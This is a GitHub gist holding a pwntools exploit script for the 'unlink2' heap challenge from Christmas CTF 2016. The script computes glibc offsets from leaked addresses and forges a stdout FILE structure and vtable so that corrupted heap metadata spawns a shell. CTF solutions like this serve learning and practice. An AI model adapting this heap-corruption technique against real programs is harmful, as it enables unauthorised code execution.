Skip to content

Instantly share code, notes, and snippets.

@Jinmo

Jinmo/unlink2.py Secret

Created December 25, 2016 07:16
Show Gist options
  • Save Jinmo/3e62fbb190833224c116b26ed40f1734 to your computer and use it in GitHub Desktop.
Save Jinmo/3e62fbb190833224c116b26ed40f1734 to your computer and use it in GitHub Desktop.
Christmas CTF 2016 House of Daehee
from pwn import *
import os
def parse(x):
x = x.strip()
print x
x = x.split(': ')[1]
x = int(x, 16)
return x
local = True
if local:
# p = remote('0.0.0.0', 31337)
p = process('/media/sf_j/unlink2')
else:
p = process('/home/christmas1/unlink2')
p.recvuntil('0x')
h = int(p.recvuntil(',', drop=True), 16)
p.recvuntil(': 0x')
system = int(p.recvuntil('.', drop=True), 16)
if local:
free_hook = system + 0x380418
libc_base = system - 0x45390
stdin = libc_base + 0x3c38e0
stdout = libc_base + 0x3c4620
gets = libc_base + 0x6ed80
lock = libc_base + 0x3c5780
wide_data = libc_base + 0x3c37a0
else:
free_hook = system + 0x380428
libc_base = system - 0x45380
stdin = system + 0x3c38e0
stdout = system + 0x3c4620
gets = libc_base + 0x6ecc0
lock = libc_base + 0x3c5780
wide_data = libc_base + 0x3c37a0
print hex(h)
print hex(system)
jumplist = ''.join(p64(i * 0x1000) for i in range(100)).replace(p64(0x5000), p64(gets)).replace(p64(0x6000), p64(system))
payload = p64(0) + p64(0x21) + p64(stdout + 216 - 8) + p64(h + 8 * 4) + jumplist
obj = 'sh'.ljust(8, '\x00') + p64(stdout + 213) * 7 + p64(stdout + 214) + p64(0) * 4 + p64(stdin) + p64(1) + p64(0xffffffffffffffff)
obj += p64(0x0000000009000000) + p64(lock) + p64(0xffffffffffffffff) + p64(0) + p64(wide_data) + p64(0) * 3 + p64(0xffffffff) + p64(0) * 2 + p64(h + 8 * 4 + 8)
if '\n' in obj:
exit()
p.writeline(payload)
p.writeline(obj)
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment